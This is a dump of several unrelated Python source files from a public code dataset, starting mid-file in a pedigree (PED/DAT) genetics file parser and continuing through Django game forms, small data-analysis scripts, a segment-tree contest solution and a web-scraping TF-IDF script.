Verify your PED/DAT file.\")\n #fi\n #edef\n\n @property\n def raw(self):\n row = [ str(self.__row[featureName]) for (featureType, featureName) in self.__datFormat ]\n return row\n #edef \n\n def __getitem__(self, identifier):\n if isinstance(identifier, int):\n fieldName = self.__datFormat.getFeatureName(identifier)\n if fieldName is None:\n return None\n #fi\n return self.__row[fieldName]\n elif isinstance(identifier, str):\n return self.__row[identifier]\n #fi\n return None\n #edef\n\n def __len__(self):\n return len(self.__row) if self.__row is not None else 0\n #edef\n\n def __setitem__(self, key, value):\n if isinstance(key, int):\n fieldName = self.__datFormat.getFeatureName(key)\n if fieldName is None:\n return None\n #fi\n self.__row[fieldName] = value\n elif isinstance(key, str):\n self.__row[key] = value\n #fi\n return None\n #edef\n\n def getFeatureName(self, identifier):\n return self.__datFormat[identifier][2]\n #edef\n\n @property\n def affections(self):\n return self.__datFormat.affections\n #edef\n\n @property\n def covariates(self):\n return self.__datFormat.covariates\n #edef\n\n @property\n def traits(self):\n return self.__datFormat.traits\n #edef\n\n @property\n def markers(self):\n return self.__datFormat.markers\n #edef\n\n def emptyValueOfField(self, fieldID):\n return self.__datFormat.emptyValueOfField(self, fieldID)\n #edef\n\n def __str__(self):\n dstr = \"Genotype and Phenotype Object\\n\"\n for fieldName in self.__row:\n dstr += \" %s: %s\\n\" % (fieldName, self.__row[fieldName])\n #efor\n return dstr\n #edef\n\n def copy(self, datFormat):\n return PhenoGenotype(self.raw, datFormat)\n #edef\n\n#eclass\n\n###############################################################################\n\nclass Family(object):\n slots = [ '__famID', '__members', '__datFormat' ]\n def __init__(self, famID, datFormat, members=[]):\n self.__famID = str(famID)\n self.__datFormat = datFormat\n if isinstance(members, dict):\n self.__members = members\n else:\n self.__members = { member.ID : member for member in members }\n #fi\n #edef\n\n def __str__(self):\n dstr = \"\"\n dstr += \"Pedigree Family\\n\"\n dstr += \" Members: %d\\n\" % len(self.__members)\n dstr += \" Founders: %d\\n\" % self.nFounders\n return dstr\n #edef\n\n def __contains__(self, memberID):\n return str(memberID) in self.__members\n #fi\n\n @property\n def famID(self):\n return self.__famID\n #edef\n\n def add(self, individual):\n if isinstance(individual, Individual):\n if individual.ID in self.__members:\n utils.dbm(\"Overwriting individual '%s' in family '%s'\" % (individual.ID, self.famID))\n #fi\n self.__members[individual.ID] = individual\n else:\n utils.error(\"Cannot add this object to family\")\n #fi\n #edef\n\n def newMember(self, indivID, fatherID, motherID, gender):\n if isinstance(fatherID, Individual):\n if fatherID.famID != self.famID:\n utils.error(\"Family ID of father (%s) is not this family: '%s'\" %(father.famID, self.famID))\n return None\n #fi\n fatherID = fatherID.ID\n elif (fatherID is not None) and (fatherID not in self.__members):\n utils.warning(\"FatherID '%s' is not present in this family.\" % fatherID)\n #fi\n if isinstance(motherID, Individual):\n if motherID.famID != self.famID:\n utils.error(\"Family ID of mother (%s) is not this family: '%s'\" %(mother.famID, self.famID))\n return None\n #fi\n motherID = motherID.ID\n elif (motherID is not None) and (motherID not in self.__members):\n utils.warning(\"MotherID '%s' is not present in this family.\" % motherID)\n #fi\n\n features = 
PhenoGenotype([], self.__datFormat)\n newPerson = Individual(self.famID, indivID, fatherID, motherID, gender, features)\n self.add(newPerson)\n return newPerson\n #edef\n\n def delMember(self, memberID):\n memberID = str(memberID)\n if memberID in self.__members:\n del self.__members[memberID]\n for member in self.__members:\n if self.__members[member].motherID == memberID:\n self.__members[member].setMother(None)\n elif self.__members[member].fatherID == memberID:\n self.__members[member].setFather(None)\n #fi\n #efor\n #fi\n #edef\n\n def __len__(self):\n return len(self.__members)\n #edef\n\n def __iadd__(self, individual):\n self.add(individual)\n #edef\n\n @property\n def nFounders(self):\n return len([m for m in self.__members.values() if m.isFounder])\n #edef\n\n @property\n def members(self):\n return self.__members\n #edef\n\n def __iter__(self):\n return self.__members.__iter__()\n #edef\n\n def __getitem__(self, key):\n return self.members[key]\n #edef\n\n def changeMemberID(self, currentID, newID):\n if currentID not in self.__members:\n utils.warning(\"Cannot change name of '%s', no such member.\" % currentID)\n return\n #fi\n self.__members[newID] = self.__members[currentID]\n self.__members[newID].setID(newID)\n del self.__members[currentID]\n\n for memberID in self.__members:\n if memberID != newID:\n if self.__members[memberID].motherID == currentID:\n self.__members[memberID].setMother(newID)\n elif self.__members[memberID].fatherID == currentID:\n self.__members[memberID].setFather(newID)\n #fi\n #fi\n #efor\n #edef\n\n def copy(self, datFormat):\n members = { memberID: self.__members[memberID].copy(datFormat) for memberID in self.__members }\n return Family(self.famID, datFormat, members)\n #edef\n\n#eclass\n \n############################################################################### \n\nclass DAT(object):\n\n __slots__ = [ '__fields', '__mask', '__types', '__names', '__fileName' ]\n\n def __init__(self, data, delimiter=' ', quotechar='#', mask=None):\n\n self.__fields = None\n self.__types = None\n self.__names = None\n self.__fileName = None\n self.__mask = None\n\n fields = []\n if isinstance(data, str):\n with open(data, 'r') as ifd:\n reader = csv.reader(ifd, delimiter=delimiter, quotechar=quotechar)\n for row in reader:\n row = [ col for col in row if col != \"\" ]\n if len(row) != 2:\n continue\n #fi\n fieldType = row[0].lower()\n fieldValue = row[1]\n if fieldType == 'e':\n break\n #fi\n if fieldType not in [ 'a', 'c', 't', 'm', 's' ]:\n utils.warning(\"Unknown fieldType '%s'\" % fieldType)\n fieldType = 's'\n #fi\n fields.append((fieldType, fieldValue))\n #efor\n #ewith\n self.__fields = fields\n self.__fileName = data\n else:\n self.__fields = data\n #fi\n\n if (mask is None) or len(mask) != len(self.__fields):\n self.__mask = [ False for field in self.__fields ]\n else:\n self.__mask = mask\n #fi\n self.__indexFields()\n #edef\n\n def __indexFields(self):\n self.__types = {}\n self.__names = {}\n for i, (fieldType, fieldName) in enumerate(self.__fields):\n fieldType = fieldType.lower()\n if fieldType not in self.__types:\n self.__types[fieldType] = []\n #fi\n self.__types[fieldType].append(i)\n self.__names[fieldName] = i\n #efor\n\n def add(self, fieldType, fieldName):\n if fieldName in self.__names:\n utils.error(\"Field '%s' already exists.\" % fieldName)\n return\n #fi\n fieldType = fieldType.lower()\n if fieldType not in 'actms':\n utils.error(\"'%s' not a valid field type.\" % fieldType)\n else:\n self.__fields.append((fieldType, fieldName))\n 
self.__indexFields()\n self.__mask.append(False)\n #fi\n #edef\n\n @property\n def affections(self):\n return self.__types['a'] if 'a' in self.__types else []\n #edef\n\n def emptyFeatures(self):\n return [ self.emptyValueOfField(fieldType) for (fieldType, fieldName) in self.__fields ]\n #edef\n\n @property\n def covariates(self):\n return self.__types['c'] if 'c' in self.__types else []\n #edef\n\n @property\n def traits(self):\n return self.__types['t'] if 't' in self.__types else []\n #edef\n\n @property\n def markers(self):\n return self.__types['m'] if 'm' in self.__types else []\n #edef\n\n def __getitem__(self, identifier):\n if isinstance(identifier, int):\n fieldType, fieldName = self.__fields[identifier]\n return (identifier, fieldType, fieldName)\n elif isinstance(identifier, str):\n fieldID = self.__names[identifier]\n fieldType, fieldName = self.__fields[fieldID]\n return (fieldID, fieldType, fieldName)\n else:\n return None\n #fi\n #edef\n\n def __len__(self):\n return len(self.__fields)\n\n def __iter__(self):\n return self.__fields.__iter__()\n #edef\n\n def keys(self):\n return self.__names\n #edef\n\n def __contains__(self, field):\n return field in self.__names\n #edef\n\n def getFeatureType(self, field):\n fieldID, fieldType, fieldName = self[field]\n return fieldType\n #eidef\n\n def setFeatureType(self, field, newFieldType):\n fieldID, fieldType, fieldName = self[field]\n newFieldType = newFieldType.lower()\n if newFieldType in [ 'a', 'c', 't', 'm', 's' ]:\n self.__fields[fieldID] = (newFieldType, fieldName)\n else:\n utils.error(\"Invalid feature type '%s'.\" % newFieldType)\n #edef\n\n def getFeatureName(self, field):\n fieldID, fieldType, fieldName = self[field]\n return fieldName\n #eidef\n\n def getFeatureID(self, fieldName):\n fieldID, fieldType, fieldName = self[fieldName]\n return fieldID\n #edef\n\n def maskFeature(self, featureName):\n featureID, featureType, featureName = self[featureName]\n self.__mask[featureID] = True\n #edef\n\n def unmaskFeature(self, featureName, newFeatureType=None):\n featureID, featureType, featureName = self[featureName]\n self.__mask[featureID] = False\n if newFeatureType is not None:\n self.setFeatureType(featureName, newFeatureType)\n self.__mask[featureID] = False\n #edef\n\n def detectType(self, value):\n if ('/' in value) or ( ' ' in value):\n return 'm'\n elif value.upper() == 'X':\n return 't'\n elif value in [ '0', '1', '2' ]:\n return 'a'\n else:\n return 's'\n #fi\n #edef\n\n def emptyValueOfField(self, fieldID):\n fieldID, fieldType, fieldName = self[fieldID]\n\n if fieldType == 'a':\n return 'X'\n elif fieldType == 'c':\n return 'X'\n elif fieldType == 't':\n return 'X'\n elif fieldType == 'm':\n return '0/0'\n elif fieldType == 's':\n return 'X'\n else:\n return '0'\n #fi\n #edef\n\n def write(self, fileName):\n with open(fileName, \"w\") as ofd:\n for i, (fieldType, fieldName) in enumerate(self.__fields):\n fieldType = 'S' if self.__mask[i] else fieldType.upper()\n ofd.write(\"%s %s\\n\" % (fieldType, fieldName))\n #efor\n ofd.write(\"E\\tEND-OF-DATA\\n\")\n self.__fileName = fileName\n #ewith\n #edef\n\n def copy(self):\n return DAT([ (fieldType, fieldName) for (fieldType, fieldName) in self.__fields], mask=self.__mask)\n #edef\n\n#eclass\n\n###############################################################################\n\nclass PED(object):\n\n __slots__ = [ 'families', '__fileName', '__datFile', '__datFormat' ]\n\n def __init__(self, data, datFile=None, datFormat=None, **kwargs):\n\n self.families = {}\n 
self.__fileName = None\n self.__datFile = datFile\n self.__datFormat = None\n\n if datFormat is not None:\n self.__datFormat = datFormat\n elif isinstance(datFile, str):\n self.__datFormat = DAT(datFile)\n self.__datFile = datFile\n else:\n utils.warning(\"You must provide a DAT file to match. I will try to guess them!\")\n self.__datFormat = DAT([])\n self.__datFile = None\n #fi\n\n if isinstance(data, str):\n self.families = PED.fromFile(data, self.__datFormat)\n self.__fileName = data\n elif isinstance(data, dict):\n self.families = data\n elif isinstance(data, Family):\n self.families = { data.famID : data }\n else:\n self.families = { f.famID for f in data }\n #fi\n #edef\n\n def __contains__(self, famID):\n return str(famID) in self.families\n #edef\n\n def __getitem__(self, famID):\n famID = str(famID)\n if famID in self.families:\n return self.families[famID]\n #fi\n return None\n #edef\n\n def __delitem__(self, famID):\n famID = str(famID)\n if famID in self.families:\n del self.families[famID]\n #fi\n #edef\n\n def subset(self, famIDs):\n datFormatCopy = self.__datFormat.copy()\n if isinstance(famIDs, str) or isinstance(famIDs, int):\n famIDs = [ famIDs ]\n #fi\n famIDs = [ str(famID) for famID in famIDs ]\n retFams = { famID : self.families[famID].copy(datFormatCopy) for famID in famIDs if (famID in self.families)}\n return PED(data = retFams, datFormat=datFormatCopy)\n #edef\n\n def emptyFeatures(self):\n self.__datFormat.emptyFeatures()\n #edef\n\n #def delFeature(self, featureName)\n #def renameFeature(self, featureName)\n def maskFeature(self, feature):\n self.__datFormat.maskFeature(feature)\n #edef\n \n def unmaskFeature(self, feature, newFeatureType=None):\n self.__datFormat.unmaskFeature(feature, newFeatureType)\n #edef\n\n\n def addFeature(self, featureType, featureName, defaultValue=None):\n self.__datFormat.add(featureType, featureName)\n emptyValue = self.__datFormat.emptyValueOfField(featureName) if defaultValue is None else defaultValue\n\n for famID in self:\n for memberID in self[famID]:\n self[famID][memberID].setFeature(featureName, emptyValue)\n #efor\n #efor\n #edef\n\n def features(self):\n return self.__datFormat.keys()\n #edef\n\n def getFeature(self, featureName):\n values = {}\n if featureName not in self.__datFormat:\n utils.error(\"Feature '%s' doesn't exist.\" % featureName)\n return values\n #fi\n\n for famID in self.families:\n family = self[famID]\n for memberID in family:\n values[(famID, memberID)] = family[memberID].getFeature(featureName)\n #efor\n #efor\n return values\n #edef\n\n def __iter__(self):\n return self.families.__iter__()\n #edef\n\n def newFamily(self, famID):\n famID = str(famID)\n if famID in self.families:\n utils.warning(\"Overwriting family '%s'.\" % famID)\n #fi\n self.families[famID] = Family(famID, self.__datFormat, [])\n return self.families[famID]\n #edef\n\n @staticmethod\n def fromFile(fileName, datFormat, delimiter='\\t', quotechar='#', nrows=None, **kwargs):\n irow = 0\n families = {}\n with open(fileName, 'r') as ifd:\n rePattern = re.compile(r\"[\\s]+\")\n \n for line in ifd:\n row = [ col for col in rePattern.split(line) if col != \"\" ]\n irow = irow + 1\n if (nrows is not None) and (irow > nrows):\n utils.dbm(\"I will; break here\")\n break\n #fi\n if len(row) < 5:\n break\n #fi\n \n indiv = Individual.fromRow(row, datFormat)\n if indiv.famID not in families:\n families[indiv.famID] = Family(indiv.famID, datFormat, [indiv])\n else:\n families[indiv.famID].add(indiv)\n #fi\n #efor\n #ewith\n return families\n 
#edef\n\n @property\n def nFeatures(self):\n return len(self.__datFormat)\n #edef\n\n def __str__(self):\n dstr = \"PED object\\n\"\n dstr += \" Where: %s\\n\" % (self.__fileName if self.__fileName is not None else hex(id(self)))\n dstr += \" DAT file: %s\\n\" % (self.__datFile if self.__datFile is not None else hex(id(self.__datFormat)))\n dstr += \" Families: %d\\n\" % len(self.families)\n dstr += \" Founders: %d\\n\" % sum([ self.families[famID].nFounders for famID in self.families ])\n dstr += \" Total: %d\\n\" % ( sum([ len(self.families[famID]) for famID in self.families ]) )\n dstr += \" Features: %d\\n\" % (self.nFeatures)\n dstr += \" Affections: %d\\n\" % len(self.__datFormat.affections)\n dstr += \" Covariates: %d\\n\" % len(self.__datFormat.covariates)\n dstr += \" Traits: %d\\n\" % len(self.__datFormat.traits)\n dstr += \" Markers: %d\\n\" % len(self.__datFormat.markers)\n\n return dstr\n #edef\n\n def write(self, fileName, datFileName=None):\n\n if datFileName is None:\n if fileName[-3:].lower() == 'ped':\n datFileName = fileName[:-3] + 'dat'\n else:\n datFileName = fileName + '.dat'\n #fi\n #fi\n\n with open(fileName, 'w') as ofd:\n for famID in self.families:\n for memberID in self.families[famID].members:\n member = self.families[famID][memberID]\n row = member.toRow()\n ofd.write('\\t'.join(row) + '\\n')\n #efor\n #efor\n self.__fileName = fileName\n #ewith\n\n self.__datFormat.write(datFileName)\n #edef\n\n standardValues = {\n 'affected_true' : 2,\n 'affected_false' : 1,\n 'affected_unknown' : 0,\n }\n\n#eclass\n","repo_name":"thiesgehrmann/BIU","sub_path":"biu/formats/pedUtils.py","file_name":"pedUtils.py","file_ext":"py","file_size_in_byte":20889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71068319505","text":"import json\nimport random\nfrom django import forms\nfrom .models import Settlers\n\n\nclass SubmitError(Exception):\n pass\n\n\nclass JSONField(forms.CharField):\n widget = forms.HiddenInput\n\n def clean(self, value):\n value = super().clean(value)\n return json.loads(value) if value else value\n\n\nclass SettlersNewGameForm(forms.ModelForm):\n game = JSONField()\n\n class Meta:\n model = Settlers\n fields = ['game', 'player_profiles']\n widgets = {\n 'player_profiles': forms.CheckboxSelectMultiple\n }\n labels = {\n 'player_profiles': 'Players'\n }\n\n def save(self):\n instance = super().save()\n player_profiles = list(instance.player_profiles.all())\n random.shuffle(player_profiles)\n\n colors = ['red', 'blue', 'orange', 'white']\n if len(player_profiles) > 4:\n colors.extend(['green', 'brown'])\n random.shuffle(colors)\n\n players = []\n for profile in player_profiles:\n player_color = None\n if profile.favorite_colors:\n for color in profile.favorite_colors.split(','):\n if color in colors:\n player_color = color\n break\n player_color = player_color or colors[0]\n players.append({'id': profile.user.id, 'name': str(profile), 'color': player_color})\n colors.remove(player_color)\n\n instance.game['players'] = players\n instance.game['turns'] = []\n instance.save()\n return instance\n\n def clean_player_profiles(self):\n player_profiles = self.cleaned_data['player_profiles']\n print(player_profiles)\n if len(player_profiles) not in [3,4]:\n raise forms.ValidationError('You must select 3 or 4 players to begin')\n\n return player_profiles\n\n\nclass SettlersTurnForm(forms.ModelForm):\n turn = JSONField()\n trade = JSONField(required=False)\n\n class Meta:\n model = Settlers\n fields = 
['turn', 'trade']\n\n def clean(self):\n turn = self.cleaned_data['turn']\n if turn['roll'] != self.instance.game['nextRoll']:\n raise SubmitError(400)\n\n return self.cleaned_data\n\n\nclass SettlersAcceptTradeForm(forms.ModelForm):\n response = JSONField()\n\n class Meta:\n model = Settlers\n fields = ['response']\n","repo_name":"dakrauth/django-settlers","sub_path":"src/settlers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9600557294","text":"\r\nimport csv\r\n\r\nwith open(\"C:\\\\Users\\\\Sahil\\\\Downloads\\\\amazon_jobs_dataset.csv\", encoding ='UTF-8') as file_obj:\r\n csv_obj = csv.DictReader(file_obj,skipinitialspace=True)\r\n list1=list(csv_obj)\r\n# print(csv_obj)\r\n# cnt_ban=0\r\n# cnt_canada=0\r\n\r\ndict={}\r\n\r\nfor row in list1:\r\n str=row['Posting_date'].split(',')[-1].strip()\r\n # print(str)\r\n if str=='2018':\r\n mon=row['Posting_date'].split(',')[0].strip().split()[0]\r\n # key=mon\r\n dict[mon]=dict.get(mon,0) +1\r\n\r\n# print(dict)\r\nhighest_mon=''\r\nhighest_val=0\r\n\r\nfor k,v in dict.items():\r\n if v>=highest_val:\r\n highest_mon=k\r\n highest_val=v\r\n\r\n\r\nprint (highest_mon,' ',highest_val)\r\n","repo_name":"malhotrasahil/coding_ninjas","sub_path":"pycharm/file/amazon_job_month_2018.py","file_name":"amazon_job_month_2018.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121284946","text":"# https://atcoder.jp/contests/abl/submissions/17044531\n# D - Flat Subsequence\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\nclass SegTree:\n \"\"\"\n init(init_val, ide_ele): 配列init_valで初期化 O(N)\n update(k, x): k番目の値をxに更新 O(N)\n query(l, r): 区間[l, r)をsegfuncしたものを返す O(logN)\n \"\"\"\n def __init__(self, init_val, segfunc, ide_ele):\n \"\"\"\n init_val: 配列の初期値\n segfunc: 区間にしたい操作\n ide_ele: 単位元\n n: 要素数\n num: n以上の最小の2のべき乗\n tree: セグメント木(1-index)\n \"\"\"\n n = len(init_val)\n self.segfunc = segfunc\n self.ide_ele = ide_ele\n self.num = 1 << (n - 1).bit_length()\n self.tree = [ide_ele] * 2 * self.num\n # 配列の値を葉にセット\n for i in range(n):\n self.tree[self.num + i] = init_val[i]\n # 構築していく\n for i in range(self.num - 1, 0, -1):\n self.tree[i] = self.segfunc(self.tree[2 * i], self.tree[2 * i + 1])\n\n def update(self, k, x):\n \"\"\"\n k番目の値をxに更新\n k: index(0-index)\n x: update value\n \"\"\"\n k += self.num\n self.tree[k] = x\n while k > 1:\n self.tree[k >> 1] = self.segfunc(self.tree[k], self.tree[k ^ 1])\n k >>= 1\n\n def query(self, left, right):\n \"\"\"\n [left, right)のsegfuncしたものを得る\n left: index(0-index)\n right: index(0-index)\n \"\"\"\n res = self.ide_ele\n left += self.num\n right += self.num\n while left < right:\n if left & 1:\n res = self.segfunc(res, self.tree[left])\n left += 1\n if right & 1:\n res = self.segfunc(res, self.tree[right - 1])\n left >>= 1\n right >>= 1\n return res\n\n\ndef resolve():\n n, k = map(int, input().split())\n A = list(int(input()) for _ in range(n))\n MAX = max(A) + 1\n seg = SegTree([0 for _ in range(MAX)], lambda x, y: max(x, y), -f_inf)\n res = [0] * MAX\n for a in A:\n left = max(0, a - k)\n right = min(MAX + 1, a + k + 1)\n ma = seg.query(left, right)\n seg.update(a, ma + 1)\n res[a - 1] = ma + 1\n\n print(max(res))\n\n\nif __name__ == '__main__':\n 
resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"ABC/ACLBC/ACLBC_D.py","file_name":"ACLBC_D.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24496687991","text":"from __future__ import print_function\nfrom pybufr_ecmwf.bufr_table import BufrTable\n\nBTABLE = 'pybufr_ecmwf/ecmwf_bufrtables/B2550000000098006001.TXT'\nSEARCH_STRING = 'WMO'\n\nBT = BufrTable()\nBT.load(BTABLE)\n\nprint('seaching for descriptors that contain substring: ', SEARCH_STRING)\n\nKEYS = BT.table_b.keys()\nfor k in sorted(KEYS):\n obj = BT.get_descr_object(k)\n if SEARCH_STRING in obj.name:\n # this is not python 2.6 compatible\n #print('descriptor: {:06d} name: {}'.format(k, obj.name))\n # so use this in stead\n print('descriptor: %06d name: %s' % (k, obj.name))\n","repo_name":"jdkloe/pybufr-ecmwf","sub_path":"example_programs/find_descriptor_code.py","file_name":"find_descriptor_code.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"38515464199","text":"from pathlib import Path\nfrom setuptools import setup\n\nbase_path = Path(__file__).parent\n\nwith open(base_path / \"requirements.txt\") as f:\n requirements = f.readlines()\n\nwith open(base_path / \"requirements_dev.txt\") as f:\n requirements_dev = f.readlines()\n\ndescription = \"\"\"This package implements:\n1) A class for reading Magda data files in flat file (ffd) format\n2) Routines for calculating a handful of spacecraft position properties\n with respect to Saturn\n3) An implementation of an arbitrary order B-field spherical harmonic expansion model\"\"\"\n\nsetup(\n name=\"magda_tools\",\n version=\"0.1\",\n description=\"A collection of tools for working with MAGDA data files\",\n long_description=description,\n url=\"https://github.com/ImperialCollegeLondon/magda_tools\",\n author=\"Research Software Engineering Group, Imperial College\",\n author_email=\"\",\n packages=[\"magda_tools\"],\n python_requires=\">=3.7\",\n install_requires=requirements,\n tests_require=requirements_dev,\n project_urls={\"Source\": \"https://github.com/ImperialCollegeLondon/magda_tools\"},\n)\n","repo_name":"ImperialCollegeLondon/magda_tools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26527541007","text":"import pandas\r\nfrom scipy.stats import zscore\r\n\r\n# 0 --> Non-Spammer, 1 --> Spammer\r\ndef scoringZ():\r\n\tzscoreMap = {}\r\n\tfor i in range(1,11):\r\n\t\tnamaFile = str(i)+\".csv\"\r\n\t\thari1 = pandas.read_csv(namaFile,low_memory=False,header=None)\r\n\t\thari1[12] = hari1[12].astype('category')\r\n\t\thari1[12] = hari1[12].cat.codes\r\n\t\thari1[hari1.select_dtypes('int64').columns]=hari1[hari1.select_dtypes('int64').columns].apply(zscore)\r\n\t\tzscoreMap[namaFile] = hari1\r\n\treturn zscoreMap\t\r\n\r\nallData = scoringZ()\r\n\r\ndef pengujian(data=allData):\r\n\tfor i in range(1,11):\r\n\t\tdataLatih = data[str(i)+\".csv\"]\r\n\t\tdataUji = None\r\n\t\tfor j in range(1,11):\r\n\t\t\tif(j != i):\r\n\t\t\t\tnamaFile = str(j)+\".csv\"\r\n\t\t\t\tif(dataUji is None):\r\n\t\t\t\t\tdataUji = data[namaFile]\r\n\t\t\t\telse:\r\n\t\t\t\t\tdataUji=dataUji.append(data[namaFile])\r\n\t\tfrom sklearn import svm\r\n\t\tfrom sklearn.model_selection import train_test_split\r\n\t\tX_train = 
dataLatih.iloc[:,0:12]\r\n\t\ty_train = dataLatih.iloc[:,12]\r\n\t\tX_test = dataUji.iloc[:,0:12]\r\n\t\ty_test = dataUji.iloc[:,12]\r\n\t\tclf = svm.SVC(cache_size=2000)\r\n\t\tclf.fit(X_train,y_train)\r\n\t\tfrom sklearn.metrics import precision_recall_fscore_support\r\n\t\tprecision,recall,fbeta_score,support = precision_recall_fscore_support(y_test, clf.predict(X_test))\r\n\t\twith open('NRF.txt', 'a') as the_file:\r\n\t\t\tthe_file.write(\"Day: \"+str(i)+\"\\n\")\r\n\t\t\tthe_file.write(\"Precision: \"+str(precision[1])+\"\\n\")\r\n\t\t\tthe_file.write(\"Recall: \"+str(recall[1])+\"\\n\")\r\n\t\t\tthe_file.write(\"FMeasure: \"+str(fbeta_score[1])+\"\\n\")\r\n\t\t\tthe_file.write(\"****************\"+\"\\n\")\r\n\t\tprint(\"Pass Day: \",i)\r\npengujian()","repo_name":"herley-shaori/Perolehan-Informasi-Lanjut","sub_path":"IRL.py","file_name":"IRL.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"37444639846","text":"from pymongo import MongoClient\nfrom helpers.env import load_env\n\n\ndef saveCode(email, code):\n    client = MongoClient(load_env(\"APP_MONGODB_URL\"))\n    db = client[\"djangoMFA\"]\n    codes_collection = db[\"codes\"]\n\n    codes_collection.insert_one({\n        \"email\": email,\n        \"code\": code,\n    })\n","repo_name":"shipperauto/leads_api","sub_path":"mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1320527545","text":"#!/usr/bin/env python3\n\nimport urllib.request as ul\nimport urllib.error as ule\nimport sys\nfrom boilerpipe.extract import Extractor\nimport json\nimport math\nimport scipy.stats as stats\n\n\n\n\n\ndef saveHtml():\n    f = open('hashedlinks.txt', 'r') # Get the links.\n    links = []\n    for line in f:\n        links.append(line.rstrip(\"\\n\\r\")) # Put the links in a list.\n\n    counter = 0\n    html_dump = dict() # All of the HTML Data goes here.\n\n    for link in links: # For every link\n        # Stressed human loading bar\n        sys.stdout.write(\"\\033[K\")\n        print(\"Getting HTML \" + str(round((counter / len(links)) * 100, 2)) + \"% complete.\")\n        sys.stdout.write(\"\\033[F\")\n        counter += 1\n\n        try:\n            html_data = get_html(link) # Get the HTML Code\n        except:\n            pass\n\n        if html_data != None:\n            html_dump[link] = html_data\n\n    to_save_link_text = dict() # JSON is outputted from here.\n\n    for key in html_dump.keys(): # For everything in html dump\n        raw_html = html_dump[key] # The raw html.\n\n        ex = Extractor(extractor='ArticleExtractor', html=raw_html)\n        text = ex.getText() # The parsed html.\n\n        linkdict = dict() # This is where the clean formatted data goes.\n        linkdict['raw_html'] = str(raw_html) # Put in the raw html.\n        linkdict['clean_html'] = str(text) # Put in the clean text.\n        linkdict['link'] = str(key) # Put in the link for output.\n\n        to_save_link_text[hash(key)] = linkdict\n\n    f = open('html_data.json', 'w') # Save the html for future use.\n    json.dump(to_save_link_text, f)\n    f.close()\n\n\n# Gets the html code for the webpage. If the link is not claimed by any server or\n# lacks a top level domain, it will raise an error.\ndef get_html(url):\n    try:\n        temp_html_reader = ul.urlopen(url) # Opens the page.\n    except ule.URLError:\n        return None\n\n    return temp_html_reader.read() # Returns the html code.\n\n#Calculate tfidf and output in requested format.\ndef tf_idf(searchTerm, IDF):\n    f = open('html_data.json', 'r') # Get old data.\n    data = json.load(f)\n    f.close()\n\n    print(\"TFIDF\tTF\t IDF\t URI\")\n    print(\"-----\t--\t ---\t ---\") # (below) Initialize data storage list.\n    outputList = [[0], [0], [0], [0], [0], [0], [0], [0], [0], [0], [0], [0]]\n    for key in data.keys(): # For every link.\n        clean_html = data[key]['clean_html'] # Get the clean text.\n        instances = clean_html.count(searchTerm) # Get count of of instances of the search term in the text.\n        words = clean_html.split(' ')\n        word_count = len(words) # Get word count of clean text.\n        tf = instances/word_count # Calculate tf value.\n        tfidf = (instances/word_count) * IDF # Calculate tf-idf value.\n        if round(tf, 3) != 0: # (below) store all relevant data.\n            outputList = little_sorter(outputList, tfidf, str(round_sig(tfidf, 3)) + \" \" + str(round_sig(tf, 3)) + \" \" + str(round_sig(IDF, 3)) + \" \" + data[key]['link'])\n\n    for data in outputList:\n        print(data[1]) # Print the data\n\n\n# Sorts the links by tf-idf value, maximum to minimum.\ndef little_sorter(list, newVal, fullLine, extraData = None):\n    listCounter = 0\n    nlist = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n    for i in range(12): # Find the maximum value 12 times. (NOTE in homework output will only display 10. Two results are bad bad bad.\n        if newVal > list[listCounter][0]:\n            nlist[i] = [newVal, fullLine, extraData]\n            newVal = 0\n        else:\n            nlist[i] = list[listCounter]\n        listCounter += 1\n\n    return nlist\n\n\n# Calculate idf based on number of google search results.\ndef idf(results_in_engine):\n    return math.log(130000000000000/results_in_engine, 2.0)\n\n\n# Rounds to sig figs. From user Stephen Rauch at location https://stackoverflow.com/questions/3410976/how-to-round-a-number-to-significant-figures-in-python\ndef round_sig(x, sig=2):\n    return round(x, sig-int(math.floor(math.log10(abs(x))))-1)\n\n\n# Uses the scipy library to calculate kendal tau b. 
